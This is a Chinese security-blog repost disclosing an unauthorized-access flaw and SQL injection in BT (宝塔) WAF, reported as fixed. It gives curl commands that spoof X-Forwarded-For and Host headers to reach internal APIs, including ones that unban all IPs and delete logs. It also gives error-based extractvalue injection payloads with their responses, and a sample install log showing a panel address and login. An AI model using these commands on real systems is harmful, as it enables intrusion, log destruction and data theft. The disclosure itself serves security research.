【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)

admin
admin
admin
140350
文章
117
评论
2024年2月18日01:37:40评论98 views字数 5223阅读17分24秒阅读模式

宝塔WAF防火墙最新版未授权访问漏洞+SQL 注入漏洞(已修复)

【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)

宝塔面板最新版安装
Linux面板8.0.5安装脚本
Centos安装脚本

yum install -y wget && wget -O install.sh https://download.bt.cn/install/install_6.0.sh && sh install.sh ed8484bec

Ubuntu/Deepin安装脚本

wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh ed8484bec

Debian安装脚本

wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh ed8484bec

万能安装脚本

if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install_panel.sh;fi;bash install_panel.sh ed8484bec

国产龙芯架构安装脚本

wget -O install_panel.sh https://download.bt.cn/install/0/loongarch64/loongarch64_install_panel.sh && bash install_panel.sh ed8484bec

注意:必须为没装过其它环境如Apache/Nginx/php/MySQL的新系统,推荐使用centos 7.X的系统安装宝塔面板

推荐使用Chrome、火狐、edge浏览器,国产浏览器请使用极速模式访问面板登录地址

如果不确定使用哪个Linux系统版本的,可以使用万能安装脚本

国产龙芯架构CPU安装命令,支持龙芯架构的loongnix 8.x、统信UOS 20、kylin v10系统

【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)
云WAF安装脚本
单机版脚本

URL=https://download.bt.cn/cloudwaf/scripts/install_cloudwaf.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_cloudwaf.sh "$URL";fi;bash install_cloudwaf.sh

集群版脚本

URL=https://download.bt.cn/cloudwaf/scripts/install_waf_master.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_waf_master.sh "$URL";fi;bash install_waf_master.sh

注意:已经安装了宝塔面板的机器,不用再安装云WAF,在宝塔面板上安装使用Nginx防火墙即可。

堡塔云WAF需要一台独立服务器安装部署。

安装完成后推荐使用Chrome、火狐、edge浏览器,国产浏览器(极速模式)访问登录系统

【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)

【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)

【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)

清理面板所有host检测节点(0.5s):download.bt.cn当前可用下载节点:download.bt.cn  检测www节点(0.5S):{'name': '主节点', 'url': 'www-node1.bt.cn'}检测api节点(0.5S):{'name': '主节点', 'url': 'api-node1.bt.cn'}Stopping Bt-Tasks...    doneStopping Bt-Panel...    doneStarting Bt-Panel....   doneStarting Bt-Tasks...    doneLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfilePackage firewalld-0.6.3-13.el7_9.noarch already installed and latest versionNothing to doCreated symlink from /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service to /usr/lib/systemd/system/firewalld.service.Created symlink from /etc/systemd/system/multi-user.target.wants/firewalld.service to /usr/lib/systemd/system/firewalld.service.success==================================================================Congratulations! Installed successfully!========================面板账户登录信息==========================

 外网面板地址: https://8.141.89.22:35952/4c2265a0 内网面板地址: https://172.17.225.236:35952/4c2265a0 username: yusci8xm password: 7553f5d7 =========================打开面板前请看===========================

 【云服务器】请在安全组放行 35952 端口 因默认启用自签证书https加密访问,浏览器将提示不安全 点击【高级】-【继续访问】或【接受风险并继续】访问 教程:https://www.bt.cn/bbs/thread-117246-1-1.html

==================================================================

未授权访问漏洞
2024年2月17日15:13发布更新:宝塔回应称该漏洞去年就已经修复,同时该漏洞仅可以查询数据、无法造成其他威胁。另外宝塔WAF防火墙与宝塔面板是两个产品,存在漏洞的产品是WAF防火墙,不是宝塔面板。
据 V2EX 网友发布的帖子,在春节期间他在研究宝塔面板的漏洞时,发现宝塔面板附带的 WAF 防火墙 (宝塔 Nginx 防火墙) 存在 SQL 注入漏洞。

宝塔面板的 WAF 本身是一款收费产品,购买并开通后可以用来拦截 CC 攻击或者 SQL 注入之类的,但没想到这个模块本身也存在 SQL 注入漏洞。

漏洞位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 中,构造满足特定条件的 IP 地址和域名的情况下,不需要进行任何验证即可访问宝塔面板 API。

而且还可以他通过将 x-forwarded-for header 设置为 127.0.0.1、域名设置为 127.0.0.251 来满足上面要求的条件。

配置 x-forwarded-for 头为 127.0.0.1 即可满足 ip 是 127.0.0.1 的条件

配置 host 头为 127.0.0.251 即可满足域名是 127.0.0.251 的条件

提供一条 curl 参数供大家参考

curl 'http://宝塔地址/API'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

get_btwaf_drop_ip

这个 API 用来获取已经拉黑的 IP 列表,使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/get_btwaf_drop_ip'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

remove_btwaf_drop_ip

这个 API 用来解封 IP ,提供一个 get 参数即可,使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/remove_btwaf_drop_ip?ip=1.2.3.4'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

clean_btwaf_drop_ip

这个 API 用来解封所有 IP ,使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/clean_btwaf_drop_ip'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

updateinfo

这个 API 看起来是更新配置用的,需要一个 types 参数做校验,但实际并没有什么用处,使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/updateinfo?types'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

get_site_status

这个 API 用来获取网站的配置,server_name 参数需要提供网站的域名,使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/get_site_status?server_name=bt.cn'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

clean_btwaf_logs

这个 API 用来删除宝塔的所有日志,使用以下命令发起访问

curl "http://btwaf-demo.bt.cn/clean_btwaf_logs"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

后续还有一些 API 大同小异,不一一列举了

get_global_status

clear_speed_hit

clear_replace_hit

reset_customize_cc

clear_speed_countsize

SQL注入

代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中,源文件是 luajit 编译后的内容,反编译一下即可看到源码

代码逻辑就在 get_site_status API 中,slot1 变量就是 server_name 参数。原理很简单,server_name 参数没有做任何校验就直接带入了 SQL 查询。

宝塔官网目前已经修复这个问题,拿之前的测试记录为例,试试以下命令:

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

响应如下

{"status":false,"msg":"数据查询失败: XPATH syntax error: '\btwaf': 1105: HY000."}

从响应来看已经注入成功,通过 updatexml 的报错成功的爆出了库名叫 btwaf

继续执行以下命令:

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,version()))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

响应如下

{"status":false,"msg":"数据查询失败: XPATH syntax error: '\8.1.0': 1105: HY000."}

从响应来看,mySQL 版本是 8.1.0

在继续执行以下命令

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,(select'hello,world')))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

响应如下

{"status":false,"msg":"数据查询失败: XPATH syntax error: '\hello,world': 1105: HY000."}

看起来 select ‘hello,world’ 也执行成功了,到此为止,基本可以执行任意命令。

原文始发于微信公众号(利刃信安攻防实验室):【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月18日01:37:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)https://cn-sec.com/archives/2500214.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息